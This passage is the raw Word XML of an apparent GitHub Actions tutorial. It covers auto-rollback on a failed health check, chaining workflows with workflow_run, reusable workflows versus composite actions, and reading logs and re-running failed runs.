          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> workflow that has secrets — that's how the nasty supply-chain incidents happen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 11 — Auto-rollback on health check failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="962025"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-11-rollback.png" descr="scenario-11-rollback.png" title="scenario-11-roll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962025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy, check if it's healthy, roll back if not.</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Capture current version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id: prev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echo "sha=$(cat current-version.txt)" &gt;&gt; $GITHUB_OUTPUT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Deploy new version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./deploy.sh ${{ github.sha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Health check</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id: health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./scripts/health-check.sh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continue-on-error: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Roll back if unhealthy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steps.health.outcome == 'failure'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./deploy.sh ${{ steps.prev.outputs.sha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name: Fail the workflow if rolled back</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steps.health.outcome == 'failure'</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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">continue-on-error: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> lets the health check "fail softly" — the workflow doesn't stop, so the rollback step can react. Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">steps.health.outcome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) is the bit that lets us see the failure even though </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">continue-on-error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> hid it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 12 — Workflow chaining with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">workflow_run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="1171575"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-12-chaining.png" descr="scenario-12-chaining.png" title="scenario-12-ch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171575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">One workflow triggers another when it finishes. Useful for separating CI from CD, or decoupling slow jobs from the main pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow A (`ci.yml`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the test workflow:</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CI</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test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow B (`deploy.yml`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — listens for A to succeed:</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workflow_run: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workflows: [CI]</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types: [completed]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 github.event.workflow_run.conclusion == 'success'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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps test logic and deploy logic in separate files. Easier to read, safer to change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The combined shape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Most real production pipelines look roughly like this:</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Trigger:</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PR  → CI</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Tag → Production CD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Pipeline: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Build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Parallel Tests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Parallel Microservices Deploy</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Final Health Check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">And the rule of thumb:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">PR → CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Tag → Release / CD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → sequential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → parallel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Microservices → mostly parallel, unless one truly depends on another.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD design isn't really about workflows. It's about use cases and dependencies. The YAML is the easy part.</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13. When you start repeating yourself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">At some point you'll notice the same five steps showing up at the top of every workflow. That's your signal to extract. GitHub Actions offers two tools for this, and they solve different problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 Reusable workflows — reuse a whole job</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">One workflow file calls another. The callee declares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">workflow_call:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its trigger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Callee — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/reusable-test.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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workflow_call:</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inputs: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required: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type: string</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secrets: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NPM_TOKEN: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required: false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actions/setup-node@v4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 ${{ inputs.node-version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ci</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NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN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test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Caller — anywhere else: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unit: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./.github/workflows/reusable-test.yml</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 '20'</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secrets:</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NPM_TOKEN: ${{ secrets.NPM_TOKEN }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this when the unit you want to reuse is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">whole job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — like a shared test harness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13.2 Composite actions — reuse a cluster of steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A composite action packs several steps into one reusable step. Lives at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/actions/&lt;name&gt;/action.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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'Setup Node with cache'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description: 'Checkout, install Node with npm cache, and run npm ci'</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inputs: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required: true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default: '20'</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runs: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using: 'composite'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actions/setup-node@v4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 ${{ inputs.node-version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cache: 'npm'</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run: npm ci</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shell: bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: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./.github/actions/setup-node-cached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node-version: '20'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this when the thing you're reusing is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">setup pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the first few steps of every job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Which one do I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You want to reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>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Use</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 whole job (or several)</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Reusable workflow</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 setup pattern of 2–5 steps</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Composite action</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Something across repos</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Publish as a standalone repo action</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Logic that needs its own runner</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Reusable workflow (it owns </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">runs-on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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14. Debugging, and running workflows on your laptop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflows will fail. Your first instinct might be panic — don't. The tooling for figuring out what went wrong is pretty good once you know where to look.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The failure is almost always in the last ten lines of the failed step. Click into the run, click the failed job, expand the red step, scroll to the bottom. That's usually enough.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When it isn't: the search box (top right) searches every step's output in one go. And the gear icon offers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Download log archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gives you a zip with one text file per step — sometimes easier to grep through locally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Three buttons live at the top right of every run page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-run all jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — full restart, new run ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-run failed jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
